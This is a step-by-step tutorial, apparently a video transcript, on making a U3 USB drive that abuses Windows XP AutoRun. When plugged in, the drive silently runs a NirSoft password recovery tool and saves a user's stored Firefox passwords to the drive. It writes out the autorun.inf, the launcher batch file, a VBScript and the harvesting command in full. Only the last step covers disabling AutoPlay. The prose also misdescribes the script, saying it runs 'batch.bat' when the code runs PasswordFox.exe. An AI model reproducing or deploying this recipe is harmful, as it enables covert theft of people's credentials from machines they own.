When it comes to computer security, sometimes it's good to know what it is that you're trying to protect yourself from. In this video, I'm going to cover the AutoRun feature in Windows and why, for security reasons, you should never use it. To prove my point, I'm going to show you how to make a USB drive that exploits the autorun feature to automatically download and save a users information just by plugging it into a USB port.

Step 1: Material List

To do this project, you are going to need:
- U3 usb drive, such as a sandisk cruizer,
- Access to a Windows XP machine.

What makes a U3 usb drive unique is that it emulates a CD rom drive so that it can autorun it's "launchpad" whenever you plug it into your computer. This is useful because Windows will not allow programs to autorun straight from a USB drive, but it will allow programs to autorun from CD drives and since a U3 usb drive shows up as both, we can use this feature to autorun our USB drive.

Step 2: Download Universal Customizer

Backup everything that's currently on your USB drive. Then go to this website: http://www.u3community.com/viewtopic.php?t=434 and download the "Universal Customizer" program. This program is going to allow us to replace the U3 Launchpad application with our own autolaunching application. Unfortunately, this program only works on Windows XP, so you'll have to have an XP machine to run this. When it's through downloading, extract all of the files to your desktop and open up the "U3CUSTOM" folder. This folder is where we're going to create our custom autolaunching program

Step 3: Creating the Autorun and Launch Files

The first thing that we want to do is create an "autorun" file, so right click within the folder and select "new > text document". Rename it as "autorun.inf" and then double click on it to open it up. Type:

[AutoRun]
open=launch.exe -a

Then click File > Save. This will autorun a program called "launch.exe" that we're going to make right now. So right click in the folder again and select "new>textdocument" and rename it "launch.bat". Then right click on it and select "edit". Now type:

\usb.vbs

Save, and close it. This will tell it to open a file called "usb.vbs" that we will create in a second. But first we need to convert the batch file to an executable that Windows can autorun.

Step 4: Converting BAT to EXE

To convert launch.bat to an executable, go to this website http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html and download the Bat to EXE converter. Open it up and run the exe file. For the "Batch file" field, point to the "launch.bat" file that you created. Then click "compile". You should now see a "launch.exe" file in your "U3Custom" folder.

Step 5: Creating the USB.vbs Script

Now let's create the usb.vbs file. This will find the drive letter of the USB drive so that we can automatically save stuff to it. So, create another new text document and rename it to "usb.vbs". Then right click on it and select edit. You want to type in this code:

Dim oFSO, oDrive,objFolder,oUsbDrive,oDestination, shell
Const USBDRIVE=1
oDestination = "c:\test"
Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
Set shell=createobject("wscript.shell")
'Get USB drive letter
For Each oDrive In oFSO.Drives

If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> "A" Then
WScript.Echo "found usb at", oDrive.DriveLetter
oUsbDrive = oDrive.DriveLetter & ":\"
shell.run oDrive.DriveLetter & ":\PasswordFox.exe"
set shell=nothing
End If
Next
Sub CopyFiles(oPath, oDst)
Set objFolder = oFSO.GetFolder(oPath)
For Each Files In objFolder.Files
WScript.Echo "Copying File",Files
newDst=oDst&"\"&Files.Name
oFSO.CopyFile Files,newDst,True
WScript.Echo Err.Description
Next
'Recursive copy, uncomment if needed
' For Each oDir In objFolder.SubFolders
' CopyFiles oDir.Path, oDst
' Next
End Sub

Basically what this script does is scan the computer for a USB drive and then executes a file called "batch.bat" from that USB drive. Once you have that done, click save and exit and now we can burn this to our U3 drive.

Step 6: Burn the Files to the Virtual U3 CD

Go back up to the main "universal customizer" directory and click "isocreate.cmd". This will turn our folder into an iso file that we will then put on the USB drive. Now click on "universal_customizer.exe". Just follow the instructions in the program and it will set up your U3 drive to run our custom created launcher. When it's through, click done. You will need to pull out your usb drive and plug it back in and it may give you an error, but that's because we haven't put any programs on it, which we will do in the next step.

Step 7: Loading the Hacking Programs

You can find some good programs at "nirsoft.net" that are good for retrieving passwords and information. Such as PasswordFox. Just extract the files and copy them to your USB drive. Lastly, we need to create a USB file that runs the program silently and stores the data it collects back on the USB drive. So right click in the USB drive and create a new text file and rename it "batch.bat". Then right click on it and select "edit". To launch the program type:

start %~dp0PasswordFox.exe /shtml %~dp0firefox.html

you want to replace "PasswordFox.exe" with whatever program you downloaded. And according to the nirsoft website that we downloaded it from, if we want to save the password results as an html file, we can type /shtml firefox.html. Now to make sure that it reads it and saves it to the USB drive, we need to put "%~dp0" before both filenames. Now save the file and test it out. Put it in a computer that has autorun enabled and within a second, you should have an html file saved to your USB drive with the users information.

Step 8: Protection

The best way to protect yourself from this type of hack is to disable any type of autorun feature. To enable/disable autorun in windows xp, go to "start > run" type gpedit.msc and hit enter. Select "Administrative Templates > System" and then double click on "Turn off autoplay" to enable/disable it. In vista and 7 go to start and type "gpedit.msc", select administrative templates > Windows Components" and double click on "Autoplay policies" to enable or disable it.